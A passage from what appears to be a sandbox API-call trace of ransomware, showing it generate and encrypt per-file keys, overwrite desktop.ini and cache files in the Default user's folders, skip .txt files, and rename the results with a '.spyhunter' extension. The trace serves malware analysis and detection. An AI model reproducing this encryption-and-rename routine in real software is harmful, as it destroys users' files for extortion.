GetProcessHeap () returned 0x2c0000 [0141.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.546] GetProcessHeap () returned 0x2c0000 [0141.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.546] GetProcessHeap () returned 0x2c0000 [0141.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7708 | out: hHeap=0x2c0000) returned 1 [0141.546] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf060 | out: pbBuffer=0x25cf060) returned 1 [0141.546] GetProcessHeap () returned 0x2c0000 [0141.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.546] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf058*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf058*=0x30) returned 1 [0141.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.547] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0141.547] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.547] GetProcessHeap () returned 0x2c0000 [0141.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.547] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf01c*=0x43, lpOverlapped=0x0) returned 1 [0141.548] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.549] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf01c*=0x43, lpOverlapped=0x0) returned 1 [0141.549] GetProcessHeap () returned 0x2c0000 [0141.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.549] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.549] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf05c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x25cf05c*, lpNumberOfBytesWritten=0x25cf01c*=0x4, lpOverlapped=0x0) returned 1 [0141.549] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf01c*=0x30, lpOverlapped=0x0) returned 1 [0141.549] CloseHandle (hObject=0xf0) returned 1 [0141.549] GetProcessHeap () returned 0x2c0000 [0141.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.549] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.spyhunter") returned 78 [0141.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.spyhunter")) returned 1 [0141.550] GetProcessHeap () returned 0x2c0000 [0141.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.550] GetProcessHeap () returned 0x2c0000 [0141.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.550] GetProcessHeap () returned 0x2c0000 [0141.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef4d8 | out: hHeap=0x2c0000) returned 1 [0141.551] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf058 | out: pbBuffer=0x25cf058) returned 1 [0141.554] GetProcessHeap () returned 0x2c0000 [0141.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf050*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf050*=0x30) returned 1 [0141.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0141.554] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0141.554] GetProcessHeap () returned 0x2c0000 [0141.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.554] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf014, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf014*=0x0, lpOverlapped=0x0) returned 1 [0141.555] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.555] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf014, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf014*=0x0, lpOverlapped=0x0) returned 1 [0141.555] GetProcessHeap () returned 0x2c0000 [0141.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.555] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.555] WriteFile (in: hFile=0x184, lpBuffer=0x25cf054*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf014, lpOverlapped=0x0 | out: lpBuffer=0x25cf054*, lpNumberOfBytesWritten=0x25cf014*=0x4, lpOverlapped=0x0) returned 1 [0141.556] WriteFile (in: hFile=0x184, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf014, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf014*=0x30, lpOverlapped=0x0) returned 1 [0141.556] CloseHandle (hObject=0x184) returned 1 [0141.556] GetProcessHeap () returned 0x2c0000 [0141.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.556] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].spyhunter") returned 85 [0141.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].spyhunter")) returned 1 [0141.556] GetProcessHeap () returned 0x2c0000 [0141.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.556] GetProcessHeap () returned 0x2c0000 [0141.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.557] GetProcessHeap () returned 0x2c0000 [0141.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7828 | out: hHeap=0x2c0000) returned 1 [0141.557] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf050 | out: pbBuffer=0x25cf050) returned 1 [0141.557] GetProcessHeap () returned 0x2c0000 [0141.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.557] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf048*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf048*=0x30) returned 1 [0141.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.557] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0141.557] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.557] GetProcessHeap () returned 0x2c0000 [0141.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.557] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf00c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf00c*=0x43, lpOverlapped=0x0) returned 1 [0141.558] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.558] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x25cf00c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf00c*=0x43, lpOverlapped=0x0) returned 1 [0141.558] GetProcessHeap () returned 0x2c0000 [0141.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.558] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.559] WriteFile (in: hFile=0x184, lpBuffer=0x25cf04c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf00c, lpOverlapped=0x0 | out: lpBuffer=0x25cf04c*, lpNumberOfBytesWritten=0x25cf00c*=0x4, lpOverlapped=0x0) returned 1 [0141.559] WriteFile (in: hFile=0x184, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf00c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf00c*=0x30, lpOverlapped=0x0) returned 1 [0141.559] CloseHandle (hObject=0x184) returned 1 [0141.559] GetProcessHeap () returned 0x2c0000 [0141.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.559] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.spyhunter") returned 87 [0141.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.spyhunter")) returned 1 [0141.933] GetProcessHeap () returned 0x2c0000 [0141.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.934] GetProcessHeap () returned 0x2c0000 [0141.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.934] GetProcessHeap () returned 0x2c0000 [0141.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31e80 | out: hHeap=0x2c0000) returned 1 [0142.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf030 | out: pbBuffer=0x25cf030) returned 1 [0142.024] GetProcessHeap () returned 0x2c0000 [0142.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.025] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf028*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf028*=0x30) returned 1 [0142.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.027] GetProcessHeap () returned 0x2c0000 [0142.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.027] GetProcessHeap () returned 0x2c0000 [0142.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e808 | out: hHeap=0x2c0000) returned 1 [0142.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf030 | out: pbBuffer=0x25cf030) returned 1 [0142.028] GetProcessHeap () returned 0x2c0000 [0142.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.028] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf028*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf028*=0x30) returned 1 [0142.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\." (normalized: "c:\\users\\default\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.028] GetProcessHeap () returned 0x2c0000 [0142.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.028] GetProcessHeap () returned 0x2c0000 [0142.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e778 | out: hHeap=0x2c0000) returned 1 [0142.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf028 | out: pbBuffer=0x25cf028) returned 1 [0142.030] GetProcessHeap () returned 0x2c0000 [0142.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf020*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf020*=0x30) returned 1 [0142.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.030] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0142.031] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.031] GetProcessHeap () returned 0x2c0000 [0142.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.031] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cefe4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cefe4*=0x192, lpOverlapped=0x0) returned 1 [0142.033] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.033] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x25cefe4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cefe4*=0x192, lpOverlapped=0x0) returned 1 [0142.033] GetProcessHeap () returned 0x2c0000 [0142.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.033] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.033] WriteFile (in: hFile=0x120, lpBuffer=0x25cf024*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cefe4, lpOverlapped=0x0 | out: lpBuffer=0x25cf024*, lpNumberOfBytesWritten=0x25cefe4*=0x4, lpOverlapped=0x0) returned 1 [0142.033] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cefe4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x25cefe4*=0x30, lpOverlapped=0x0) returned 1 [0142.033] CloseHandle (hObject=0x120) returned 1 [0142.033] GetProcessHeap () returned 0x2c0000 [0142.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.033] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.spyhunter") returned 52 [0142.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\documents\\desktop.ini.spyhunter")) returned 1 [0142.034] GetProcessHeap () returned 0x2c0000 [0142.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.034] GetProcessHeap () returned 0x2c0000 [0142.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.034] GetProcessHeap () returned 0x2c0000 [0142.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b088 | out: hHeap=0x2c0000) returned 1 [0142.034] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf020 | out: pbBuffer=0x25cf020) returned 1 [0142.034] GetProcessHeap () returned 0x2c0000 [0142.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf018*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf018*=0x30) returned 1 [0142.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.035] GetProcessHeap () returned 0x2c0000 [0142.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.035] GetProcessHeap () returned 0x2c0000 [0142.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e6e8 | out: hHeap=0x2c0000) returned 1 [0142.035] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf020 | out: pbBuffer=0x25cf020) returned 1 [0142.035] GetProcessHeap () returned 0x2c0000 [0142.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.035] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf018*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf018*=0x30) returned 1 [0142.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\." (normalized: "c:\\users\\default\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.035] GetProcessHeap () returned 0x2c0000 [0142.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.035] GetProcessHeap () returned 0x2c0000 [0142.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e418 | out: hHeap=0x2c0000) returned 1 [0142.036] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf018 | out: pbBuffer=0x25cf018) returned 1 [0142.036] GetProcessHeap () returned 0x2c0000 [0142.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.036] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf010*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf010*=0x30) returned 1 [0142.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.037] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0142.037] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.037] GetProcessHeap () returned 0x2c0000 [0142.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.037] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cefd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cefd4*=0x11a, lpOverlapped=0x0) returned 1 [0142.039] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.039] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x25cefd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cefd4*=0x11a, lpOverlapped=0x0) returned 1 [0142.039] GetProcessHeap () returned 0x2c0000 [0142.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.039] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.039] WriteFile (in: hFile=0x120, lpBuffer=0x25cf014*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cefd4, lpOverlapped=0x0 | out: lpBuffer=0x25cf014*, lpNumberOfBytesWritten=0x25cefd4*=0x4, lpOverlapped=0x0) returned 1 [0142.039] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cefd4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x25cefd4*=0x30, lpOverlapped=0x0) returned 1 [0142.039] CloseHandle (hObject=0x120) returned 1 [0142.039] GetProcessHeap () returned 0x2c0000 [0142.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.039] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.spyhunter") returned 50 [0142.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\desktop\\desktop.ini.spyhunter")) returned 1 [0142.040] GetProcessHeap () returned 0x2c0000 [0142.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.040] GetProcessHeap () returned 0x2c0000 [0142.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.040] GetProcessHeap () returned 0x2c0000 [0142.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0afe8 | out: hHeap=0x2c0000) returned 1 [0142.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf010 | out: pbBuffer=0x25cf010) returned 1 [0142.040] GetProcessHeap () returned 0x2c0000 [0142.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf008*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf008*=0x30) returned 1 [0142.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.041] GetProcessHeap () returned 0x2c0000 [0142.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.041] GetProcessHeap () returned 0x2c0000 [0142.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36848 | out: hHeap=0x2c0000) returned 1 [0142.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf010 | out: pbBuffer=0x25cf010) returned 1 [0142.041] 